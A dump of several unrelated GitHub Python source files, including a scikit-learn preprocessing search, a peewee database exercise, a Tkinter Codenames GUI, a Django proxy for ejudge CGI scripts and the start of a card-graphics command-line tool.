{2}/{3}]\".format(conter,number_of_iterations,iteration,n_iterations)]\n results.to_csv('results_preprocess_2.csv',index=False)\n categorical_data = categorical_data_copy \n numerical_data = numerical_data_copy\n conter+=1\n #print(X_)\n \n idx = (-(np.array(score_))).argsort()[:5] # Select high score index\n for i in idx:\n 
distribution_conter.append(data[i].split('; ')[-8].split(': ')[1])\n outlier_conter.append(data[i].split('; ')[-7].split(': ')[1])\n num_cat_feature_conter.append(data[i].split('; ')[-6].split(': ')[1]) # Estimator conter\n numerical_feature_conter.append(data[i].split('; ')[-5].split(': ')[1])\n categorical_feature_conter.append(data[i].split('; ')[-4].split(': ')[1])\n scaler_conter.append(data[i].split('; ')[-3].split(': ')[1])\n estimator_conter.append(data[i].split('; ')[-2].split(': ')[1])\n iteration +=1\n\n final_results = {}\n with open('best_estimators_2.txt','w') as f:\n f.write('DISTRIBUTION\\n')\n for i in list(set(distribution_conter)):\n final_results[i]=distribution_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n f.write('\\nOUTLIER\\n')\n for i in list(set(outlier_conter)):\n final_results[i]=outlier_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n f.write('\\nNUM_CAT_FEATURE\\n')\n for i in list(set(num_cat_feature_conter)):\n final_results[i]=num_cat_feature_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n f.write('\\nNUMERICAL_FEATURE\\n')\n for i in list(set(numerical_feature_conter)):\n final_results[i]=numerical_feature_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n f.write('\\nCATEGORICAL_FEATURE\\n')\n for i in list(set(categorical_feature_conter)):\n final_results[i]=categorical_feature_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n f.write('\\nSCALER\\n')\n for i in list(set(scaler_conter)):\n final_results[i]=scaler_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n f.write('\\nESTIMATOR\\n')\n for i in list(set(estimator_conter)):\n final_results[i]=estimator_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n if return_best == True:\n f.write('BEST PARAMS\\n')\n f.write(str(best_params))\n\n\"\"\" ------------------------ALPHA PREPROCESSING PARAMETERS------------------------ \"\"\"\n\n# <--------------------------------------------------------------------------> # \n# <-------------------------- NUMERICAL IMPUTER -----------------------------> #\n\nnumerical_imputer = ['passthrough',SimpleImputer(),KNNImputer(),IterativeImputer(random_state=0,max_iter=3000)]\n\nnumerical_imputer_params = [\n {'None':[None]}, # Delete Imputer\n {'strategy':['median','mean']},\n {'None':[None]},\n {'None':[None]} \n ]\n\n\nnumerical_imputer = parameter_iterator(numerical_imputer,numerical_imputer_params)\n\nname_numerical_imputer = [str(i) for i in numerical_imputer]\n\n# <-------------------------- CATEGORICAL IMPUTER ---------------------------> #\n\ncategorical_imputer = ['passthrough',SimpleImputer()]\n\ncategorical_imputer_params = [\n {'None':[None]}, # Delete-Imputer\n {'strategy':['most_frequent']}, # Simple-Imputer\n ]\n\n\ncategorical_imputer = parameter_iterator(categorical_imputer,categorical_imputer_params)\nname_categorical_imputer = [str(i) for i in categorical_imputer]\n\n# <---------------------------- ENCODER -------------------------------------> #\n\nencoder = [OneHotEncoder()]\n\nencoder_params = [\n {'None':[None]} # OneHotEncoder\n ]\n \n\nencoder = parameter_iterator(encoder,encoder_params)\n\nname_encoder = [str(i) for i in encoder]\n\n# <--------------------------------- SCALER ---------------------------------> #\n\nscaler = ['passthrough',RobustScaler(), MinMaxScaler(), MaxAbsScaler(),StandardScaler()]\n\nscaler_params = [\n {}, # None\n {}, # Robust\n {}, # MinMax\n {}, # MaxAbs\n {}, # StandardScaler\n ]\n\n\nname_scaler = [str(i) for i in 
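# --- Editor's sketch (hypothetical usage, assuming parameter_iterator above is in scope) ---
# parameter_iterator (see the FUNCTIONS section) expands each transformer's
# parameter grid with itertools.product and emits one configured clone per
# combination; {'None': [None]} is the convention for "no parameters", since
# the failed set_params call falls into the except branch and the transformer
# is appended unchanged. Two SimpleImputer strategies become two candidates:
from sklearn.impute import SimpleImputer

candidates = parameter_iterator(
    [SimpleImputer()], [{"strategy": ["median", "mean"]}]
)
assert [c.strategy for c in candidates] == ["median", "mean"]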
scaler]\n\n# <------------------------------- PREDICTOR --------------------------------> #\n\nname_estimator = ['LinearRegression']\n\nestimator = [LinearRegression()]\n\nestimator_params = [\n {} # LogisticRegression\n ]\n\n# <--------------------------------------------------------------------------> #\n\n\"\"\" ------------------------ RUN PREPROCESSING ONE------------------------- \"\"\"\n\nbest_pipeline = alpha_preprocessing(X,y,name_numerical_imputer,numerical_imputer,\n name_categorical_imputer,categorical_imputer,\n name_encoder, encoder,\n name_scaler,scaler,scaler_params,\n name_estimator,estimator,estimator_params,\n numerical_data,categorical_data,encoding_data,20,df=False) \n\nnumerical_imputer_index = name_numerical_imputer.index(best_transformer('NUMERICAL_IMPUTER',best_pipeline))\n\ncategorical_imputer_index = name_categorical_imputer.index(best_transformer('CATEGORICAL_IMPUTER',best_pipeline))\n\nencoder_imputer_index = name_encoder.index(best_transformer('CATEGORICAL_ENCODER',best_pipeline))\n\n# Para el segundo alpha_preprocessing el df = True para que devuelva los dataframes,\n# el número de iteraciones igual a 1 porque no es necesario más\n\nX_preprocessed_1, y_preprocessed_1 = alpha_preprocessing(X,y,[name_numerical_imputer[numerical_imputer_index]],[numerical_imputer[numerical_imputer_index]],\n [name_categorical_imputer[categorical_imputer_index]],[categorical_imputer[categorical_imputer_index]],\n [name_encoder[encoder_imputer_index]], [encoder[encoder_imputer_index]],\n [name_scaler[0]],[scaler[0]],[scaler_params[0]],\n name_estimator,estimator,estimator_params,\n numerical_data,categorical_data,encoding_data,1,df=True) \n\n# Para el 1 paso beta return_best = False para elegir lso mejores transformadoes y n_iterations debe ser alto para realizar varias\n# pruebas ya que los transformadores pueden ser estocasticos\n\ncategorical_data = list(X_preprocessed_1.columns[[i not in numerical_data for i in X_preprocessed_1.columns]])\n\n# <------------------------------- OUTLIER ----------------------------------> #\n\noutlier = [None,LocalOutlierFactor(),IsolationForest()]\n\noutlier_params = [\n {'None':[None]}, # None\n {'None':[None]}, # LOF\n {'None':[None]} # IFO\n ]\n\n\noutlier = parameter_iterator(outlier,outlier_params)\n\nname_outlier = [str(i) for i in outlier]\n\n# <----------------------- NUM CAT FEATURES / DIME RED ----------------------> #\n\nnum_cat_feature = ['passthrough',SelectKBest(score_func=mutual_info_regression),LinearDiscriminantAnalysis(),PCA()]\n\nnum_cat_feature_params = [\n {'None':[None]}, # None\n {'k':[i for i in range(1,len(X_preprocessed_1.columns)+1)]}, # KBest\n {'n_components':[i for i in range(1,len(X_preprocessed_1.columns)+1)]}, # LDA\n {'n_components':[i for i in range(1,len(X_preprocessed_1.columns)+1)]} # PCA\n ] \n\nnum_cat_feature = parameter_iterator(num_cat_feature,num_cat_feature_params)\n\nname_num_cat_feature = [str(i) for i in num_cat_feature]\n\n# <--------------------------- NUMERICAL FEATURES ---------------------------> #\n\nnumerical_feature = ['passthrough',SelectKBest(score_func=r_regression)]\n\nnumerical_feature_params = [\n {'None':[None]}, # None\n {'k':[i for i in range(1,len(numerical_data)+1)]}, # KBest\n ]\n\nnumerical_feature = parameter_iterator(numerical_feature,numerical_feature_params)\n\nname_numerical_feature = [str(i) for i in numerical_feature]\n\n# <-------------------------- CATEGORICAL FEATURES --------------------------> #\n\ncategorical_feature = 
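# --- Editor's sketch (hypothetical, not part of the record above) ---
# best_transformer above tracks the running maximum by hand, but `j` is only
# assigned inside the except branch on the first pass, so later iterations
# keep comparing against the first count. Picking the key with the highest
# count is a one-liner with max():
def best_transformer_max(counts: dict) -> str:
    return max(counts, key=counts.get)

assert best_transformer_max({"KNNImputer()": 3, "SimpleImputer()": 7}) == "SimpleImputer()"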
['passthrough',SelectKBest(score_func=chi2)]\n\ncategorical_feature_params = [\n {'None':[None]}, # None\n {'k':[i for i in range(1,len(categorical_data)+1)]}, # KBest\n ]\n\ncategorical_feature = parameter_iterator(categorical_feature,categorical_feature_params)\n\nname_categorical_feature = [str(i) for i in categorical_feature]\n\n# <--------------------------------- SCALER ---------------------------------> #\n\nscaler = ['passthrough',RobustScaler(), MinMaxScaler(), MaxAbsScaler(),StandardScaler()]\n\nscaler_params = [\n {'None':[None]}, # None\n {'None':[None]}, # Robust\n {'None':[None]}, # MinMax\n {'None':[None]}, # MaxAbs\n {'None':[None]}, # StandardScaler\n ]\n\nscaler = parameter_iterator(scaler,scaler_params)\n\nname_scaler = [str(i) for i in scaler]\n\n# <------------------------------ DISTRIBUTION ------------------------------> #\n\ndistribution = ['passthrough',QuantileTransformer(output_distribution='normal'),PowerTransformer()]\n\ndistribution_params = [\n {'None':[None]}, # passthroug\n {'None':[None]}, # Quantile\n {'None':[None]} # Power\n ]\n\ndistribution = parameter_iterator(distribution,distribution_params)\n\nname_distribution = [str(i) for i in distribution]\n\n# <------------------------------- PREDICTOR --------------------------------> #\n\nname_estimator = ['LinearRegression']\n\nestimator = [LinearRegression()]\n\nestimator_params = [\n {} # LogisticRegression\n ]\n# <--------------------------------------------------------------------------> #\n\nbeta_preprocessing(X_preprocessed_1, y_preprocessed_1,name_outlier,outlier,\n name_num_cat_feature,num_cat_feature,\n name_numerical_feature,numerical_feature,\n name_categorical_feature,categorical_feature,\n name_distribution,distribution,\n name_scaler,scaler,\n name_estimator,estimator,estimator_params,\n numerical_data,categorical_data,3,return_best=False)\n \n\n","repo_name":"Exlonk/PHYMOL","sub_path":"preprocessing_pipeline.py","file_name":"preprocessing_pipeline.py","file_ext":"py","file_size_in_byte":37175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23594130698","text":"\"\"\"Lesson07activity - Create a department table for the db and query the db.\n\nIn this exercise, based on instructor-provided code, a very simply\nHR-like database is created.\nThe db contains 3 tables:\n person (PK: person name)\n job (PK: job name; FK: person name)\n department (no PK 'cos no unique fields; FK: job name)\n\nFrom Activity description: \"Finally, produce a list using pretty print that\nshows all of the departments a person worked in for every job they ever had.\"\n\nIn this exercise, I wrote pprint_depts.py and populate_debt_db.py\nand modified personjobdept_model.py.\n\"\"\"\nimport peewee\n\nfrom RDBMS.personjobdept_model import Person, Job, Department\nfrom RDBMS.populate_person_db import populate_db as populate_people\nfrom RDBMS.populate_job_db import populate_db as populate_jobs\nfrom RDBMS.populate_dept_db import populate_db as populate_departments\n\n# Populate the databe\npopulate_people()\npopulate_jobs()\npopulate_departments()\n\n\ndef pretty_print_person_job_dept(query):\n \"\"\"Print a list using a query from the db in about the following format.\n\n Person_1\n worked as Title_1 at Department_1 for XX days\n worked as Title_2 at Department_1 for XX days\n Person_2\n had no jobs\n \"\"\"\n print('\\n')\n for person in query:\n print(person.person_name)\n if len(person.was_filled_by) > 0:\n for job in person.was_filled_by:\n print(f' worked 
as {job.job_name}', end=' ')\n for dept in job.job_held_at:\n print(f'at {dept.dept_name} for {dept.days_in_job} days')\n else:\n print(' had no jobs')\n print('\\n')\n\n# QUERY 1: using prefetch() - all people, with or w/out jobs\npeople = Person.select().order_by(Person.person_name)\npositions = Job.select().order_by(Job.job_name)\norg_units = Department.select().order_by(Department.dept_name)\nquery1 = peewee.prefetch(people, positions, org_units)\n\n# QUERY 2: using join() - only people with jobs are included\nquery2 = (Person\n .select(Person, Job, Department)\n .join(Job)\n .join(Department)\n .group_by(Person)\n .order_by(Person.person_name)\n )\n\n# QUERY 3: using join() - all people are included with JOIN.LEFT_OUTER\nquery3 = (Person\n .select(Person, Job, Department)\n .join(Job, peewee.JOIN.LEFT_OUTER)\n .join(Department, peewee.JOIN.LEFT_OUTER)\n .group_by(Person)\n .order_by(Person.person_name)\n )\n\nfor query in (query1, query2, query3):\n pretty_print_person_job_dept(query)\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/alex_skrn/Lesson07Activity/pprint_depts.py","file_name":"pprint_depts.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25744269378","text":"n = int(input(\"please input your desire number:\"))\r\nx = n\r\ntotal = 0\r\nfor i in range(1, n+1):\r\n if n % i == 0:\r\n\r\n if i == n:\r\n continue\r\n total = total + i\r\nif total == x:\r\n print(n, \"is a perfect number\")\r\nelse:\r\n print(n, \"is not a perfect number\")\r\n\r\n\r\n","repo_name":"Sabbirbracu/Assignment-02","sub_path":"Task 14.py","file_name":"Task 14.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39710230114","text":"from src.writer import writer\n\ndef func():\n\tprocessor = writer()\n\treturn processor.write(0, \"test\")\n\ndef test_answer():\n\tif func() == \"write 0 bank1 test\":\n\t\tif len(func()) == 18:\n\t\t\tassert True\n\t\t\treturn\n\tassert False","repo_name":"Just-a-Unity-Dev/david","sub_path":"tests/test_returns.py","file_name":"test_returns.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23845567750","text":"import Stack_pfix as st\r\npfix=st.stack()\r\nexp=list(input('Please Enter a Post Fix Expression \\n'))\r\n\r\nfor i in range(len(exp)-1):\r\n if (exp[i] == '1') or (exp[i] =='2') or (exp[i] =='3') or (exp[i] =='4') or (exp[i] =='5') or (exp[i] =='6') or (exp[i] =='7') or (exp[i] =='8') or (exp[i] =='9') or (exp[i] =='0'):\r\n pfix.push(int(exp[i]))\r\n elif (exp[i]=='+'):\r\n num1=pfix.pop()\r\n num2=pfix.pop()\r\n num3=num1+num2\r\n pfix.push(num3)\r\n elif (exp[i]=='-'):\r\n num1=pfix.pop()\r\n num2=pfix.pop()\r\n num3=num2-num1\r\n pfix.push(num3)\r\n elif (exp[i]=='*'):\r\n num1=pfix.pop()\r\n num2=pfix.pop()\r\n num3=num1*num2\r\n pfix.push(num3)\r\n elif (exp[i]=='/'):\r\n num1=pfix.pop()\r\n num2=pfix.pop()\r\n num3=num2/num1\r\n pfix.push(num3)\r\n\r\npfix.pop()\r\nprint('The Result is ')\r\npfix.PrintStack()\r\n \r\n\r\n\r\n","repo_name":"RishirajCharan/Python-Data-Structure-Implementation","sub_path":"teststack.py","file_name":"teststack.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70909094189","text":"import 
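# --- Editor's sketch (hypothetical, not part of the record above) ---
# The postfix evaluator above compares each token against the ten digit
# characters one by one. str.isdigit() plus an operator table expresses the
# same single-digit postfix evaluation more compactly:
import operator

OPS = {"+": operator.add, "-": operator.sub,
       "*": operator.mul, "/": operator.truediv}

def eval_postfix(expr: str) -> float:
    stack = []
    for ch in expr:
        if ch.isdigit():
            stack.append(int(ch))
        elif ch in OPS:
            b, a = stack.pop(), stack.pop()   # right operand is popped first
            stack.append(OPS[ch](a, b))
    return stack.pop()

assert eval_postfix("23*4+") == 10   # (2 * 3) + 4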
numpy as np\r\nimport tkinter as tk\r\n\r\nfrom gamecomponents.Card import Card, Team\r\nfrom globalvariables import GRID_SIZE, BOX_WIDTH_RATIO\r\nfrom imageprocessing.Segmenter import Segmenter\r\n\r\nGrid = np.array\r\n\r\n\r\nclass CodenamesGUI:\r\n def __init__(self, team: Team = Team.RED):\r\n self.team: Team = team\r\n self.risk: int = 5\r\n self.gameOver: bool = False\r\n self.keycardImagePath: str = \"keycard.jpg\"\r\n self.wordgridImagePath: str = \"wordgrid.jpg\"\r\n\r\n def captureKeycard(self) -> str:\r\n CodenamesGUI.__captureWithOverlay(self.keycardImagePath, 1, 1)\r\n return self.keycardImagePath\r\n\r\n def verifyKeycard(self, cardGrid: Grid) -> Team:\r\n window = tk.Tk()\r\n for row in range(GRID_SIZE):\r\n for col in range(GRID_SIZE):\r\n card: Card = cardGrid[row, col]\r\n bg: str = CodenamesGUI.__getColor(card.team)\r\n button: tk.Button = tk.Button(master=window, width=8, height=3, bg=bg)\r\n button.bind(\"<Button-1>\", lambda event, c=card: CodenamesGUI.__changeTeam(event, c))\r\n button.grid(row=row, column=col, sticky=\"wens\")\r\n\r\n # My team button\r\n bg = CodenamesGUI.__getColor(self.team)\r\n button = tk.Button(master=window, width=8, height=3, bg=bg, text=\"My team\")\r\n button.bind(\"<Button-1>\", self.__changeMyTeam)\r\n button.grid(row=GRID_SIZE, column=1, sticky=\"wens\")\r\n\r\n # Submit button\r\n button = tk.Button(master=window, width=8, height=3, text=\"Submit\")\r\n button.bind(\"<Button-1>\", CodenamesGUI.__close)\r\n button.grid(row=GRID_SIZE, column=GRID_SIZE - 2, sticky=\"wens\")\r\n\r\n window.mainloop()\r\n return self.team\r\n\r\n def captureWordgrid(self) -> str:\r\n CodenamesGUI.__captureWithOverlay(self.wordgridImagePath, BOX_WIDTH_RATIO, 1)\r\n return self.wordgridImagePath\r\n\r\n def verifyWordgrid(self, cardGrid: Grid) -> int:\r\n window = tk.Tk()\r\n entries: Grid = Grid([[tk.Entry() for col in range(GRID_SIZE)] for row in range(GRID_SIZE)], dtype=tk.Entry)\r\n\r\n for row in range(GRID_SIZE):\r\n for col in range(GRID_SIZE):\r\n entries[row, col] = tk.Entry(master=window)\r\n entries[row, col].insert(0, cardGrid[row, col].text)\r\n entries[row, col].grid(row=row, column=col)\r\n\r\n label: tk.Label = tk.Label(master=window, text=\"Risk (-9 - 10+)\")\r\n label.grid(row=GRID_SIZE, column=0)\r\n entry: tk.Entry = tk.Entry(master=window)\r\n entry.insert(0, self.risk)\r\n entry.grid(row=GRID_SIZE, column=1)\r\n\r\n button: tk.Button = tk.Button(master=window, text=\"Submit\")\r\n button.bind(\"<Button-1>\", lambda event: self.__changeText(event, entries, entry, cardGrid))\r\n button.grid(row=GRID_SIZE, column=2, columnspan=GRID_SIZE - 2, sticky=\"wens\")\r\n window.mainloop()\r\n return self.risk\r\n\r\n def displayClueAndWait(self, clue: str) -> bool:\r\n window = tk.Tk()\r\n self.gameOver = False\r\n\r\n clueLabel: tk.Label = tk.Label(master=window, text=clue, font=(\"Helvetica\", 24))\r\n clueLabel.grid(row=0, column=0, columnspan=2, sticky=\"wens\")\r\n\r\n continueButton: tk.Button = tk.Button(master=window, text=\"Start next turn\")\r\n continueButton.grid(row=1, column=0)\r\n continueButton.bind(\"<Button-1>\", CodenamesGUI.__close)\r\n\r\n endButton: tk.Button = tk.Button(master=window, text=\"End game\")\r\n endButton.grid(row=1, column=1)\r\n endButton.bind(\"<Button-1>\", self.__endGame)\r\n\r\n window.mainloop()\r\n return self.gameOver\r\n\r\n # ========== PRIVATE ========== #\r\n @staticmethod\r\n def __captureWithOverlay(name: str, widthRatio: float, heightRatio: float):\r\n from picamera import PiCamera\r\n with 
PiCamera() as camera:\r\n x: int = 64\r\n y: int = 0\r\n width: int = 800\r\n height: int = 480\r\n overlay: np.array = Segmenter.iterateBoxes(width, height, widthRatio, heightRatio,\r\n Segmenter.generateOverlay)\r\n\r\n camera.start_preview(fullscreen=False, window=(x, y, width, height))\r\n cameraOverlay = camera.add_overlay(overlay, format='rgb', layer=3, alpha=128, fullscreen=False,\r\n window=(x, y, width, height))\r\n\r\n window = tk.Tk()\r\n window.geometry(\"64x480+0-1\")\r\n captureButton: tk.Button = tk.Button(master=window, text=\"C\\na\\np\\nt\\nu\\nr\\ne\", width=4, height=26)\r\n captureButton.grid(row=0, column=0, sticky=\"nesw\")\r\n captureButton.bind(\"<Button-1>\", CodenamesGUI.__close)\r\n window.mainloop()\r\n\r\n camera.capture(name, use_video_port=True)\r\n camera.remove_overlay(cameraOverlay)\r\n camera.stop_preview()\r\n\r\n @staticmethod\r\n def __getColor(team: Team) -> str:\r\n if team == Team.ASSASSIN:\r\n return \"gray10\"\r\n elif team == Team.BLUE:\r\n return \"dodger blue\"\r\n elif team == Team.RED:\r\n return \"firebrick1\"\r\n elif team == Team.NEUTRAL:\r\n return \"bisque\"\r\n\r\n @staticmethod\r\n def __changeTeam(event: tk.EventType, card: Card):\r\n newTeam: int = int(card.team) + 1\r\n if newTeam > 3:\r\n newTeam = 0\r\n card.team = Team(newTeam)\r\n newBg: str = CodenamesGUI.__getColor(card.team)\r\n event.widget.configure(bg=newBg)\r\n\r\n def __changeMyTeam(self, event: tk.EventType):\r\n self.team = Team.RED if self.team is Team.BLUE else Team.BLUE\r\n newBg: str = CodenamesGUI.__getColor(self.team)\r\n event.widget.configure(bg=newBg)\r\n\r\n @staticmethod\r\n def __close(event: tk.EventType):\r\n event.widget.master.destroy()\r\n\r\n def __changeText(self, event: tk.EventType, entries: Grid, entry: tk.Entry, cardGrid: Grid):\r\n for row in range(GRID_SIZE):\r\n for col in range(GRID_SIZE):\r\n text: str = entries[row, col].get().strip().replace(\" \", \"_\")\r\n cardGrid[row, col].text = text\r\n cardGrid[row, col].visible = bool(text)\r\n self.risk = int(entry.get())\r\n CodenamesGUI.__close(event)\r\n\r\n def __endGame(self, event: tk.EventType):\r\n self.gameOver = True\r\n CodenamesGUI.__close(event)\r\n","repo_name":"kyledpierson/codenames-spymaster","sub_path":"iomanager/CodenamesGUI.py","file_name":"CodenamesGUI.py","file_ext":"py","file_size_in_byte":6418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74489687788","text":"import io\nimport subprocess\nimport urllib.parse\nimport lxml.etree\nimport re\n\nfrom django.http import HttpResponse\n\nCGI_ROOT = \"/opt/ejudge/libexec/ejudge/cgi-bin\"\n\ndef _runcgi(request, handle, method=\"GET\", **query_params):\n query_string = urllib.parse.urlencode(query_params)\n env = {\n \"REMOTE_ADDR\": request.META[\"REMOTE_ADDR\"],\n \"HTTP_HOST\": request.META[\"HTTP_HOST\"],\n \"SCRIPT_NAME\": f\"/cgi-bin/{handle}\",\n \"REQUEST_METHOD\": method\n }\n if request.scheme == \"https\":\n env[\"HTTPS\"] = \"yes\"\n if \"EJSID\" in request.COOKIES:\n env[\"HTTP_COOKIE\"] = f\"EJSID={request.COOKIES['EJSID']}\"\n\n if method == \"POST\":\n stdin = query_string\n env[\"CONTENT_LENGTH\"] = str(len(stdin))\n env[\"CONTENT_TYPE\"] = \"application/x-www-form-urlencoded\"\n else:\n env[\"QUERY_STRING\"] = query_string\n stdin = None\n\n result = subprocess.run(\n f\"{CGI_ROOT}/{handle}\",\n input=stdin,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n check=True,\n encoding=\"utf-8\",\n env=env\n )\n\n hdr = {}\n body = io.StringIO()\n mode 
= \"header\"\n for line in result.stdout.split(\"\\n\"):\n if line.strip() == \"\" and mode == \"header\":\n mode = \"body\"\n elif mode == \"header\":\n k, v = line.split(\": \")\n hdr[k] = v\n else:\n print(line, file=body)\n\n return (hdr, lxml.etree.fromstring(body.getvalue(), lxml.etree.HTMLParser()))\n\n\ndef _xpath(html, xp):\n elem = html.xpath(xp)\n return elem[0] if len(elem) else None\n\n\ndef _breakdown_url(url):\n return dict(urllib.parse.parse_qsl(urllib.parse.urlparse(url).query))\n\n\n_postprocessors = []\n\ndef postprocessor(fn):\n _postprocessors.append(fn)\n return fn\n\ndef forward(request, handle, method=\"GET\", **query_params):\n _, content = _runcgi(request, handle, method, **query_params)\n for fn in _postprocessors:\n fn(request, content)\n return HttpResponse(lxml.etree.tostring(content))\n\n\ndef login(request, login, password):\n \"\"\"Logs in to ejudge serve-control.\n Returns a pair (SID, cookie) on successful login, or (None, None) otherwise.\n \"\"\"\n hdrs, resp = _runcgi(request, \"serve-control\", method=\"POST\", login=login, password=password)\n if _xpath(resp, \"//title/text()\") == \"Invalid login\":\n return (None, None)\n else:\n sid = _breakdown_url(hdrs[\"Location\"])[\"SID\"]\n m = re.match(\"EJSID=([0-9a-f]+)(;.*)?$\", hdrs[\"Set-Cookie\"])\n assert m is not None\n print(f\"SID={sid}, cookie={m.group(1)}\")\n return (sid, m.group(1))\n\n\ndef srvctl_sid(request):\n sid = request.session.get(\"ej_master_sid\", \"\")\n if not sid:\n return None\n\n _, resp = _runcgi(request, \"serve-control\", SID=sid)\n return sid if _xpath(resp, \"//input[@name='login']\") is None else None\n\n\ndef contest_sid_valid(request, sid):\n \"\"\"Checks if contest-local SID is still valid for current session.\"\"\"\n _, resp = _runcgi(request, \"new-master\", SID=sid)\n title = _xpath(resp, \"//title\")\n return not title.text.endswith(\"Invalid session\")\n\n\ndef contest_login(request, contest_id):\n \"\"\"Generates a contest-local SID for a contest.\"\"\"\n sid = srvctl_sid(request)\n hdrs, resp = _runcgi(request, \"new-master\", SID=sid, action=3, contest_id=contest_id)\n if \"Location\" not in hdrs:\n if _xpath(resp, \"//title\").text.endswith(\"Permission denied\"):\n return None\n raise RuntimeError(\"something went wrong\")\n return _breakdown_url(hdrs[\"Location\"])[\"SID\"]\n","repo_name":"dprokoptsev/ejproxy","sub_path":"ejproxy/ejudge.py","file_name":"ejudge.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40302818215","text":"import argparse\nimport ast\nimport os\nimport glob\nimport logging\nimport re\nimport subprocess\nimport math\n\nimport cbg.content.deck\nimport cbg.sample.size\nimport cbg.layout\n\n\nclass Application():\n '''A template for a CBG console application.\n\n Some features of this template use a variety of external programs\n with little regard to their availability, which means that portability\n is limited. 
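The class docstring above is frank about the cost of shelling out: every feature that calls an external program only works when that program is installed. A minimal standalone sketch of the call pattern used here, assuming only the Python standard library (run_external and this local ExternalError are illustrative names, not this repository's API):

import shutil
import subprocess

class ExternalError(Exception):
    """Raised when an external tool is missing or exits non-zero."""

def run_external(cmd):
    # shutil.which returns None when the executable is not on PATH,
    # giving a clearer error than a bare FileNotFoundError from run().
    if shutil.which(cmd[0]) is None:
        raise ExternalError('external application "{}" not found'.format(cmd[0]))
    try:
        result = subprocess.run(cmd, capture_output=True, text=True, check=True)
    except subprocess.CalledProcessError as e:
        raise ExternalError('"{}" exited with status {}'.format(cmd[0], e.returncode))
    return result.stdout

# e.g. run_external(['inkscape', '--version'])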
Tested on Ubuntu GNOME with appropriate extras.\n\n '''\n\n # Default raster resolution is the capacity of an HP LaserJet 1010.\n default_dpi = 600\n\n class ExternalError(Exception):\n '''Raised when a subprocess cannot be called, or fails.'''\n pass\n\n def __init__(self, name_full, decks, name_short=None,\n folder_specs='specs', folder_svg='svg', folder_png='png'):\n '''Constructor.\n\n The \"decks\" argument is expected to refer to a dictionary of\n card type classes indexed by file name strings, like this:\n\n {'example': cbg.content.card.Card}\n\n Note there is no path or suffix in the file name string.\n\n '''\n self.name_full = name_full\n self.decks = decks\n\n self.name_short = name_short\n if not self.name_short:\n # Default to initials.\n s = ''.join((w[0].lower() for w in self.name_full.split()))\n self.name_short = s\n\n self.folder_specs = folder_specs\n self.folder_svg = folder_svg\n self.folder_png = folder_png\n\n self.args = self.check_cli(self.make_cli())\n self.configure_logging()\n\n def make_cli(self):\n '''Create, but do not run, a command-line argument parser.'''\n\n d = 'Generate playing card graphics for {}.'.format(self.name_full)\n e = ('Syntax for card selection: [AMOUNT:][tag=]REGEX',\n 'AMOUNT defaults to no change (whitelist) or zero (blacklist).',\n 'REGEX with \"tag=\" refers to one card tag, else titles.',\n '',\n 'This card graphics application was made with the CBG library.',\n 'CBG Copyright 2014-2016 Viktor Eikman',\n 'CBG is free software, and you are welcome to redistribute it',\n 'under the terms of the GNU General Public License.')\n\n f = argparse.RawDescriptionHelpFormatter\n parser = argparse.ArgumentParser(description=d, epilog='\\n'.join(e),\n formatter_class=f)\n\n self._add_general_cli_opts(parser)\n self._add_selection_opts(parser)\n self._add_media_opts(parser)\n self._add_layouting_mode_opts(parser)\n\n return parser\n\n def _add_general_cli_opts(self, parser):\n '''Add general options to an argument parser.\n\n These fall under the standard argparse heading \"optional arguments\",\n though all arguments to the application are optional. We could\n suppress -h/--help getting added directly to the parser, then add\n replacements for that flag in a named group, and then call\n parser.print_help() as directed by the replacement. Not worth it.\n\n '''\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-v', '--verbose', action='store_true',\n help='extra logging')\n group.add_argument('-q', '--quiet', action='store_true',\n help='less logging')\n\n s = 'do not include the obverse side of cards in layouting'\n parser.add_argument('--no-fronts', '--no-obverse',\n dest='include_obverse', default=True,\n action='store_false', help=s)\n s = ('include the reverse side of cards in layouting; '\n 'implicit in duplex and neighbour modes')\n parser.add_argument('-B', '--backs', '--reverse',\n dest='include_reverse', default=False,\n action='store_true', help=s)\n\n group = parser.add_mutually_exclusive_group()\n s = 'send output to printer through lp (GNU+Linux only)'\n group.add_argument('-p', '--print', action='store_true', help=s)\n s = 'list cards as serialized data on console'\n group.add_argument('--list-cards', default=False,\n action='store_true', help=s)\n s = 'list images as serialized data on console'\n group.add_argument('--list-images', default=False,\n action='store_true', help=s)\n\n # Using \"nargs='?'\" can create confusion with layouting mode\n # subparser names as subsequent arguments. 
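That confusion is easy to reproduce: once subparsers are registered, a flag declared with nargs='?' will consume a following subcommand name as its value. A small self-contained demonstration (not code from this file; the build helper is hypothetical):

import argparse

def build(optional_value):
    parser = argparse.ArgumentParser()
    if optional_value:
        # nargs='?' lets the flag take zero or one value...
        parser.add_argument('--display', nargs='?', const=True, default=False)
    else:
        # ...while a plain store_true flag can never swallow a token.
        parser.add_argument('--display', action='store_true')
    sub = parser.add_subparsers(dest='layouting')
    sub.add_parser('fan')
    return parser

# The subcommand name is consumed as the value of --display:
print(build(True).parse_args(['--display', 'fan']))
# -> Namespace(display='fan', layouting=None)

# The store_true variant leaves 'fan' for the subparser:
print(build(False).parse_args(['--display', 'fan']))
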